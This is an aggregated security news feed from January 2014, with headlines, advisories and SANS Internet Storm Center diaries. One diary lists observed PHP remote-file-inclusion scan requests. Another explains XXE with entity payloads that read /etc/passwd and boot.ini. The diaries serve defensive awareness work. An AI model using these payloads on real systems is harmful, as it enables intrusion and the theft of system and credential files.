Hackin9
Tablets are getting bigger screens, moving into cars, and dual-booting Windows and Android at this year's International CES show as tech vendors give a glimpse into the gadget's future.
 
A deeper look by Cisco Systems into the cyberattack that infected Yahoo users with malware appears to show a link between the attack and a suspicious affiliate traffic-pushing scheme with roots in Ukraine.
 
Facebook is pulling the plug on a controversial advertising program that served ads to people based on the activity of their friends, such as "Likes" and check-ins.
 
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

Want To Develop Information Security Skills? Capture The Flag
NetworkComputing.com
Among computer security professionals, there's a popular competition known as Capture the Flag (CTF). You'll often find them held at less conventional conferences such as Defcon, and at universities and infosec gatherings. Played in darkened rooms and ...

 

NDTV

India's Poll Panel Declines Google Voting Services Offer Over Security Concerns
CIO
To register online as a voter on the commission website, people have to provide their email IDs and mobile phone numbers, said Jiten Jain, a member of Indian Infosec Consortium, a group of cybersecurity experts. By the tie-up with the commission ...
India's election regulator drops plan to partner Google after spying fearsWTAQ
EC cries off Google tie-upCalcutta Telegraph

all 67 news articles »
 
 
Deploying a process-improvement strategy can help your IT department be more productive and reduce errors. We talked to Six Sigma (and other) experts about why the move makes good business sense.
 
Ansible and AnsibleWorks AWX bring simplicity and power to Linux and Unix server automation
 
Snapchat has incorporated a phone number opt-out feature into its mobile app in response to a recent hacking incident -- the company's latest effort to convince users that their personal information is safe.
 
Dell on Thursday declined to confirm a report of employee layoffs, but said it could make decisions related to the workforce if necessary in order to maintain company stability.
 
Chris Boyle was surfing with friends in the Dominican Republic a few years ago when came up with the idea for the Soloshot, a robotic camera that tracks your every more from about a mile away.
 
Vendors showed many wearable devices at the International CES expo, but the next big thing may just come from an enthusiast's garage.
 
About 2.5 million Chromebooks were sold globally in 2013, or about 1% of the entire PC market, according to IDC. But most of those sales were driven by consumers, not by enterprise users.
 

-- Bojan INFIGO IS

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Today one of our readers, Yinette, sent in a pcap of a pretty massive PHP RFI scans. Yinette has been seeing this for quite some time and the number of requests sent by this (yet unknown) bot or botnet kept rising.
Judging by the source IP address the bots appear to be running on compromised web servers with typical CPanel installations and large numbers of hosted virtual servers.
 
The scanning requests are relatively fast and in the capture Yinette made the bot constantly sent at least 2 requests per second. All requests try to exploit a RFI vulnerability (I haven’t checked yet to see if all of them are well known, but a cursory inspection says most of them are well known) and the file included is the humans.txt static file on Google (http://www.google.com/humans.txt).
 
The bot almost certainly parses the output and if it sees contents of the humans.txt file it knows that the site has a RFI (Remote File Inclusion) vulnerability. Google’s availability and uptime help of course.
 
Some observed requests are shown below:
 
GET /kernel/class/ixpts.class.php?IXP_ROOT_PATH=http://www.google.com/humans.txt? HTTP/1.0
GET /kernel/loadkernel.php?installPath=http://www.google.com/humans.txt? HTTP/1.0
GET /kmitaadmin/kmitam/htmlcode.php?file=http://www.google.com/humans.txt? HTTP/1.0
GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.google.com/humans.txt? HTTP/1.0
GET /lang/leslangues.php?fichier=http://www.google.com/humans.txt? HTTP/1.0
GET /lang_english/lang_main_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /language/lang_english/lang_activity.php?phpbb_root_path=http://www.google.com/humans.txt? HTTP/1.0
GET /language/lang_english/lang_admin_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /language/lang_german/lang_admin_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /latestposts.php?forumspath=http://www.google.com/humans.txt? HTTP/1.0
GET /latex.php?bibtexrootrel=http://www.google.com/humans.txt? HTTP/1.0
GET /layout/default/params.php?gConf[dir][layouts]=http://www.google.com/humans.txt? HTTP/1.0
GET /ldap/authldap.php?includePath=http://www.google.com/humans.txt? HTTP/1.0
GET /learnPath/include/scormExport.inc.php?includePath=http://www.google.com/humans.txt? HTTP/1.0
GET /lib.editor.inc.php?sys_path=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Comment.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Rss.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Trackback.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/action/rss.php?lib=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/activeutil.php?set[include_path]=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/addressbook.php?GLOBALS[basedir]=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/armygame.php?libpath=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/authuser.php?root=http://www.google.com/humans.txt? HTTP/1.0
 
This is only a small part of all the requests the bot sends. In total, on Yinette’s web site it sent 804 requests (that’s 804 vulnerabilities it’s trying to exploit)! This indeed might be someone trying to build a big(er) botnet.

Are you seeing same/similar requests on your web site too? Or maybe you managed to catch the bot on a compromised machine or a honeypot? Let us know!

--
Bojan
@bojanz
INFIGO IS

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
A screenshot of an Apache Server log showing infected Macs connecting to a Flashback command and control server. The user agent strings and referrer strings showing Windows NT 6.1 machines, are set by Flashback. Intego has confirmed that the machines are, in fact, infected Macs.
Intego

The Flashback trojan that hijacked well over 500,000 Macs at its peak is still clinging to life, with about 22,000 infected machines in recent days, a security researcher said.

The compromised Macs were observed connecting to command and control servers that had been "sinkholed—meaning taken over for research or security purposes—by analysts from security firm Intego. During a five-day period ending January 7, 22,000 Flashback-infected computers reported to server domains recently acquired by Intego, Arnaud Abbati, a researcher with the company, wrote in a blog post. Those machines could be maliciously controlled by anyone who has access to one of the many domain names programmed into a Flashback algorithm, assuming they know how the internals of the malware works.

Flashback first came to light in 2011 when it took hold of people's machines by masquerading as a legitimate installer of Adobe's ubiquitous Flash media player. By early 2012, Flashback morphed from a socially engineered threat to one that performed surreptitious drive-by attacks by exploiting vulnerabilities in Oracle's Java software framework. Flashback was among the most sophisticated pieces of malware ever to target mainstream Mac users.

Read 5 remaining paragraphs | Comments

 

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Microsoft plans to deliver just four security updates next week, none of them marked "critical," to quash vulnerabilities in Windows, Word, SharePoint Server and Dynamics AX.
 
WordPress S3 Video Plugin 'base' Parameter Cross Site Scripting Vulnerability
 
Wallpaper Script 'name' Parameter HTML Injection Vulnerability
 
Wordpress Recommend To a Friend Plugin 'current_url' parameter Cross Site Scripting Vulnerability
 
Andy's PHP Knowledgebase Multiple Cross-Site Scripting Vulnerabilities
 
A security analysis of mobile banking apps for iOS devices from 60 financial institutions around the world has revealed that many were vulnerable to various attacks and exposed sensitive information.
 
Salesforce.com has spent plenty of time lately discussing its new Salesforce1 development platform, but most of its customers remain focused on the vendor's core CRM (customer relationship management) application, which has just received a significant new upgrade.
 
Intel has completed work on a 64-bit version of Android OS for x86 smartphones, and the software will be ready to load on handsets with its upcoming Atom 64-bit chip code-named Merrifield.
 
After three postponements, Orbital Sciences' Antares rocket lifted off today, carrying a cargo spacecraft filled with supplies for the International Space Station.
 
Microsoft CEO Steve Ballmer has watched $1.1 billion evaporate from the value of his company stock as the selection process for a successor has dragged on.
 
Puppet CVE-2013-4969 Symlink Attack Local Privilege Escalation Vulnerabilities
 

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Samba 'pam_winbind' Configuration File Security Bypass Vulnerability
 
Along with the Wireless Power Consortium, the Alliance for Wireless Power has announced several of its members will be selling charging devices for furniture and cars.
 

Times of India

India's election regulator drops plan to partner Google after spying fears
WTAQ
But the plan was opposed by the Indian Infosec Consortium, a government and private sector-backed alliance of cyber security experts, who feared Google would collaborate with "American agencies" for espionage purposes. The Election Commission did not ...
EC cries off Google tie-upCalcutta Telegraph

all 63 news articles »
 
Cisco Context Directory Agent Remote Privilege Escalation Vulnerability
 
LinuxSecurity.com: An updated gnupg package that fixes one security issue is now available for Red Hat Enterprise Linux 5. The Red Hat Security Response Team has rated this update as having moderate [More...]
 
LinuxSecurity.com: Updated openssl packages that fix three security issues are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having [More...]
 
Drupal Entity API Module Multiple Access Bypass Vulnerabilities
 
Restoring trust in our information systems after Edward Snowden's NSA revelations will take years -- if it can be done at all.
 

Secure Your Home Network with the January edition of the OUCH! Newsletter: http://www.securingthehuman.org/newsletters/ouch/issues/OUCH-201401_en.pdf

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

CounterTack Unveils Next Generation Of Sentinel For Endpoint Threat
Dark Reading
"Defending against advanced persistent threats and protecting our organization and customers from threats like Dark Seoul are our top priorities," said Jae Woo Lee, General Manager of the Managed Security Service Team, SK Infosec. "We needed a platform ...

and more »
 
The International CES might never have seen so many connected devices in its history. Never mind phones and tablets, everything from cooking pots to cars and fitness bands now connect to the Internet and broadcast information.
 
The CEOs of Apple and Samsung Electronics will participate in mediation ahead of a March trial in a patent dispute in a federal court in California.
 
IBM continues to commercialize its Watson-branded cognitive computing technology, setting up a new Watson business unit and unveiling two new Watson-derived services.
 
Cisco Adaptive Security Appliance Authorization State Change Security Bypass Vulnerability
 

CounterTack Unveils Next Generation of Sentinel for Endpoint Threat Detection ...
4-traders (press release)
"Defending against advanced persistent threats and protecting our organization and customers from threats like Dark Seoul are our top priorities," said Jae Woo Lee, General Manager of the Managed Security Service Team, SK Infosec. "We needed a platform ...

and more »
 
The number of 3D printer vendors rose from five last year to more than 20 this year, and prices for their machines have come down dramatically.
 
The oft-used phrase, 'Internet of Things' is one emerging tech jargon abstraction that average users are still noodling over in order to better understand and appreciate it.
 
Work Folders, new to Windows Server 2012 R2, helps administrators manage user-created data in a BYOD environment.
 
Singling out RSA for reproach for allegedly enabling a backdoor in one of its encryption technologies in a deal with the National Security Agency deflects attention from the role other technology vendors may have had in enabling NSA's secret data collection activities.
 
Cisco Context Directory Agent Hidden Input Security Vulnerability
 
If you are accustomed to cramming your expensive smartphone into your jeans pocket or alongside of sharp keys inside a purse, you should be glad to hear that Corning recently announced Gorilla Glass 3.
 
Many modern applications today use XML documents to transfer data between clients and servers. Due to its simplicity, XML is actually great for this and is therefore very often used for representation of various data structures.
 
Typically a rich web application will use XML to send data from the web server to the server side. This XML document, which might contain various data structures related to the web application, is then processed on the server side. Here we can see a typical problem with untrusted input – since an attacker can control anything on the client side he can impact integrity of the XML document that is submitted to the server. Generally this should not be a problem unless the following happens.
 
Since the web application (on the server side) receives the XML document we just sent, it has to somehow parse it. Depending on the framework the application uses on the server side, it’s is most often (especially business applications) either a Java or a .NET application; other frameworks typically rely on libxml2.
 
The security problem here is in a special structure defined by the XML standard, entity. Every entity has certain content and are normally used throughout the XML document. However, one specific entity type is particularly dangerous: external entities.
 
External entity declaration further allows declaration of two types: SYSTEM and PUBLIC. The SYSTEM external entity is what we are interested about – it allows one to specify a URI which will be used during dereferencing to replace the entity. One example of such an entity is shown below:
 
<!ENTITY ISCHandler
SYSTEM “https://isc.sans.edu/api/handler”>
 
Now when parsing such an XML document, wherever we have the ISCHandler entity, the parser will replace it with the contents of the retrieved URI. Pretty bad already, isn’t it? But it gets even worse – by exploiting this we can include any local file by simply pointing to it:
 
<!ENTITY ISCHandler
SYSTEM “file:///etc/passwd”>
 
Or on Windows
 
<!ENTITY ISCHandler
SYSTEM “file:///C:/boot.ini”>
 
As long as our current process has privileges to read the requested file, the XML parser will simply retrieve it and put it when it finds a reference to the ISCHandler entity (&ISCHandler;).
 
The impact of such a vulnerability is pretty obvious. A malicious attacker can actually do much more – just use your imagination:
  • We can probably DoS the application by reading from a file such as /dev/random or /dev/zero.
  • We can port scan internal IP addresses, or at least try to find internal web servers.
Obviously, probably the most dangerous “feature” is extraction of data – similarly to how we would pull data from a database with a SQL Injection vulnerability, we can read (almost) any file on the hard disk. This includes not only the password file but potentially more sensitive files such as DB connection parameters and what not. Depending on the framework, including a directory will give us even the directory’s listing, so we don’t have to blindly guess file names! Very nasty.
Everything so far is nothing new really, however in last X pentesting engagements, for some reason XXE vulnerabilities started popping up. So what is the reason for that? First of all, some libraries allow external entity definitions by default. In such cases, the developer himself has to explicitly disable inclusion of external entities. This is probably still valid for Java XML libraries while with .NET 4.0 Microsoft changed the default behavior not to allow external entities (in .NET 3.5 they are allowed).
 
So, while XXE will not become as dangerous as SQLi (hey, the subject was there to get your attention), we do find them more often than before which means that we should raise awareness about such vulnerabilities.
 
--
Bojan
@bojanz
INFIGO IS
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

Posted by InfoSec News on Jan 09

http://www.thesmokinggun.com/documents/guccifer-archive-687543

The Smoking Gun
JANUARY 6, 2014

JANUARY 6 -- The hacking spree by "Guccifer," the online outlaw who has
bedeviled Colin Powell, members of the Bush and Rockefeller families,
Obama administration officials, and assorted other public figures, has
been far more extensive than previously known, The Smoking Gun has
learned.

A large cache of documents reveals that the...
 

Posted by InfoSec News on Jan 09

http://news.techworld.com/security/3496323/nvidia-takes-customer-site-offline-after-sap-bug-found/

By Jeremy Kirk
Techworld.com
09 January 2014

Graphics chipmaker Nvidia took a customer service website offline
Wednesday following a public report of a vulnerability in its SAP-powered
backend.

The affected website, https://nvcare.nvidia.com, uses SAP's NetWeaver,
which is a framework that underpins many SAP business applications. The...
 

Posted by InfoSec News on Jan 09

http://www.independent.ie/woman/lindsay-lohan-fears-nude-photo-leak-after-laptop-is-stolen-29899036.html

[Even money says LiLo's publicist 'forgot' to pack her laptop. -WK]

08 JANUARY 2014

Lindsay Lohan's missing computer reportedly has naked pictures of her on
it.

The actress claims her PC was stolen at the airport in Shanghai, China,
and tweeted she was offering a reward for anyone who could return it.

Now TMZ...
 

Posted by InfoSec News on Jan 09

http://www.wired.com/threatlevel/2014/01/teen-reported-security-hole/

By Kim Zetter
Threat Level
Wired.com
01.08.14

A teenager in Australia who thought he was doing a good deed by reporting
a security vulnerability in a government website was reported to the
police.

Joshua Rogers, a 16-year-old in the state of Victoria, found a basic
security hole that allowed him to access a database containing sensitive
information for about 600,000...
 

Posted by InfoSec News on Jan 09

http://www.nextgov.com/cybersecurity/2014/01/nist-paid-16500-space-now-boycotted-rsa-conference/76421/

By Aliya Sternstein
Nextgov.com
Jan. 8, 2014

The National Institute of Standards and Technology purchased a $16,500
booth at an RSA event that technologists are pulling out of in protest of
the encryption company’s alleged deal with the National Security Agency to
weaken products using a NIST-approved trapdoor.

NIST’s entire leadership...
 

Posted by InfoSec News on Jan 09

http://www.theregister.co.uk/2014/01/08/rsa_conference_boycott/

By John Leyden
The Register
8th January 2014

More security researchers are boycotting next month's US edition of the
RSA Conference in protest against an alleged "secret deal" the company is
said to have struck with the National Security Agency.

Last month Reuters reported that the NSA "secretly paid" RSA Security $10m
in return for making the...
 

Posted by InfoSec News on Jan 09

http://healthitsecurity.com/2014/01/06/omnicell-data-breach-suit-dismissal-healthcare-ramifications/

By Patrick Ouellette
healthitsecurity.com
January 6, 2014

A lawsuit against Omnicell stemming from a 2012 health data breach was
recently dismissed, in part, because the plaintiff failed to prove damages
related to the breach. The interesting part of the dismissal, however, was
that there were four separate defendants that were involved that...
 
Internet Storm Center Infocon Status